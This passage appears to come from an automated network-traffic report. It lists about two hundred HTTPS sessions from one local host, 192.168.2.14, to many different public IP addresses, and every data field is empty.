                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18119192.168.2.1455214222.77.82.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18120192.168.2.145364024.176.6.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18121192.168.2.1443866119.66.33.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18122192.168.2.145705235.144.169.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18123192.168.2.1439440193.130.197.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18124192.168.2.143903832.8.165.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18125192.168.2.1458288190.187.232.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18126192.168.2.144349234.100.48.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18127192.168.2.1445558158.13.169.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18128192.168.2.143896675.226.177.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18129192.168.2.144798096.101.42.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18130192.168.2.1458474118.173.12.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18131192.168.2.1440344165.17.118.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18132192.168.2.1438276108.137.144.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18133192.168.2.145912861.197.172.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18134192.168.2.1458434113.30.169.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18135192.168.2.1452032106.135.51.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18136192.168.2.1445502129.123.54.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18137192.168.2.1443070175.218.164.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18138192.168.2.1449060195.31.47.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18139192.168.2.143671614.107.46.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18140192.168.2.1446078202.107.126.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18141192.168.2.143307474.55.208.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18142192.168.2.1449720145.151.39.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18143192.168.2.143769485.179.11.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18144192.168.2.14487622.99.246.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18145192.168.2.1443188170.112.121.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18146192.168.2.143991642.36.158.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18147192.168.2.1460600180.166.173.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18148192.168.2.145509457.10.61.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18149192.168.2.145392635.102.98.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18150192.168.2.1439824184.239.116.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18151192.168.2.1458842178.209.203.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18152192.168.2.1459338172.95.31.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18153192.168.2.1458444114.193.13.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18154192.168.2.145675057.227.109.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18155192.168.2.143886496.100.76.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18156192.168.2.1441662148.49.247.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18157192.168.2.1434932200.255.18.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18158192.168.2.143987640.69.182.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18159192.168.2.1449412188.244.76.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18160192.168.2.145801839.93.162.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18161192.168.2.143628820.243.16.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18162192.168.2.144127882.83.152.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18163192.168.2.1445550144.53.165.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18164192.168.2.145596472.122.67.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18165192.168.2.145587834.146.143.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18166192.168.2.1455010217.254.32.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18167192.168.2.145060095.115.191.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18168192.168.2.145785666.139.238.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18169192.168.2.1433458104.14.131.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18170192.168.2.144782427.213.192.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18171192.168.2.1445744111.74.37.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18172192.168.2.1449972210.111.196.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18173192.168.2.1447398211.0.164.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18174192.168.2.145869059.220.13.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18175192.168.2.143877818.68.56.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18176192.168.2.14404285.124.178.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18177192.168.2.1450372174.60.38.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18178192.168.2.143905465.107.204.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18179192.168.2.1439462154.60.6.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18180192.168.2.145282496.248.216.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18181192.168.2.1455858105.197.190.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18182192.168.2.1453400177.44.234.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18183192.168.2.143658274.35.35.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18184192.168.2.144552441.159.164.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18185192.168.2.1434162183.87.34.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18186192.168.2.1456732100.25.171.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18187192.168.2.144019470.40.64.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18188192.168.2.1456680131.228.93.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18189192.168.2.144277250.164.233.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18190192.168.2.1445388108.161.203.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18191192.168.2.1460882129.87.12.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18192192.168.2.1457546177.128.40.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18193192.168.2.144255682.217.74.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18194192.168.2.145305231.34.56.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18195192.168.2.144409420.66.51.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18196192.168.2.145625295.138.27.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18197192.168.2.1440364183.151.188.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18198192.168.2.144862880.228.17.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18199192.168.2.1456254199.227.37.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18200192.168.2.144113252.40.159.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18201192.168.2.1454756198.139.85.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18202192.168.2.1442504183.89.14.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18203192.168.2.14434044.222.30.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18204192.168.2.1433912219.216.207.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18205192.168.2.1439030122.106.81.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18206192.168.2.145168668.186.160.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18207192.168.2.1457624128.191.114.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18208192.168.2.1460712111.74.78.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18209192.168.2.143720046.148.248.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18210192.168.2.1441310141.72.38.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18211192.168.2.144525682.166.26.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18212192.168.2.143635886.247.110.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18213192.168.2.1457276196.53.102.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18214192.168.2.145009245.36.21.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18215192.168.2.1450424144.17.180.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18216192.168.2.1434224144.143.151.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18217192.168.2.1450400163.157.118.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18218192.168.2.144745683.97.191.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18219192.168.2.145602262.168.151.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18220192.168.2.144850295.141.29.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18221192.168.2.143699814.77.107.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18222192.168.2.1436646206.47.134.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18223192.168.2.1442278171.116.7.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18224192.168.2.1439114190.89.78.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18225192.168.2.144551893.81.46.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18226192.168.2.1460130217.161.243.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18227192.168.2.1454562197.242.22.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18228192.168.2.1446060205.145.59.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18229192.168.2.145820493.220.31.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18230192.168.2.1459112130.154.154.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18231192.168.2.1440094198.175.239.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18232192.168.2.1450976201.110.225.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18233192.168.2.1454496130.72.20.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18234192.168.2.144806852.120.81.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18235192.168.2.1436670114.201.221.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18236192.168.2.143922443.113.135.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18237192.168.2.144260045.187.7.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18238192.168.2.1458138170.184.48.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18239192.168.2.144679014.233.165.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18240192.168.2.1443708112.71.174.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18241192.168.2.146037236.83.165.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18242192.168.2.143535878.9.217.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18243192.168.2.1454290167.59.25.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18244192.168.2.1437126148.1.83.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18245192.168.2.1457656202.86.246.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18246192.168.2.143525652.203.125.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18247192.168.2.1436994171.5.46.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18248192.168.2.1451682171.64.202.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18249192.168.2.144568017.217.78.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18250192.168.2.1460820199.155.155.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18251192.168.2.1453004203.191.246.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18252192.168.2.1459150168.201.12.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18253192.168.2.1448730222.62.84.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18254192.168.2.1447366190.35.71.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18255192.168.2.143316636.3.82.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18256192.168.2.1456280177.27.104.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18257192.168.2.1437222211.248.178.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18258192.168.2.1434486169.160.44.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18259192.168.2.1439134173.240.167.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18260192.168.2.145149698.63.163.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18261192.168.2.143493285.195.17.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18262192.168.2.1434992115.34.83.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18263192.168.2.1446208110.221.56.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18264192.168.2.144456883.143.223.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18265192.168.2.143354024.202.33.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18266192.168.2.145257618.15.19.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18267192.168.2.1454568126.132.196.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18268192.168.2.1445756120.39.136.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18269192.168.2.145705438.115.104.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18270192.168.2.1443482184.99.241.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18271192.168.2.1448580144.18.204.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18272192.168.2.1448256125.58.219.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18273192.168.2.14384022.6.223.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18274192.168.2.145532475.134.233.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18275192.168.2.1452232139.191.189.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18276192.168.2.1453716134.114.56.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18277192.168.2.143473469.41.250.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18278192.168.2.143497870.131.70.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18279192.168.2.1441388210.101.45.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18280192.168.2.145539470.65.31.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18281192.168.2.145155624.70.13.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18282192.168.2.1445548202.92.88.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18283192.168.2.144323036.98.188.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18284192.168.2.1444764189.36.251.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18285192.168.2.1439830106.98.197.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18286192.168.2.145460244.142.242.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18287192.168.2.1451116151.91.61.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18288192.168.2.146083094.89.72.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18289192.168.2.1442020199.241.197.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18290192.168.2.145582866.82.99.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18291192.168.2.143604414.117.125.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18292192.168.2.145378688.206.68.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18293192.168.2.14440002.160.126.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18294192.168.2.1448742153.123.164.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18295192.168.2.143851240.16.166.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18296192.168.2.1441252219.0.221.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18297192.168.2.14346049.142.100.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18298192.168.2.1440556199.177.180.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18299192.168.2.143499219.254.220.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18300192.168.2.1436170190.106.61.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18301192.168.2.144367838.109.129.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18302192.168.2.1452226122.251.90.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18303192.168.2.1440502145.172.192.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18304192.168.2.145976459.18.160.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18305192.168.2.1453396222.81.9.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18306192.168.2.1432834207.130.167.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18307192.168.2.146049458.246.204.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18308192.168.2.1443030151.65.168.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18309192.168.2.144695646.76.210.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18310192.168.2.144266892.144.83.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18311192.168.2.145087243.190.28.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18312192.168.2.144657641.235.94.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18313192.168.2.143682087.109.196.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18314192.168.2.143685664.6.223.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18315192.168.2.145833835.98.120.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18316192.168.2.1448028128.226.44.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18317192.168.2.1453238151.18.100.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18318192.168.2.14329588.99.244.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18319192.168.2.144720825.148.121.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18320192.168.2.1447972210.162.112.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18321192.168.2.144554438.159.10.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18322192.168.2.1445430170.188.254.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18323192.168.2.145058878.77.80.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18324192.168.2.1435110177.137.153.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18325192.168.2.145208461.30.250.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18326192.168.2.144276824.133.227.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18327192.168.2.145599860.39.123.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18328192.168.2.143426254.120.16.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18329192.168.2.1458870125.54.6.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18330192.168.2.143441458.177.35.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18331192.168.2.145606888.65.44.13443
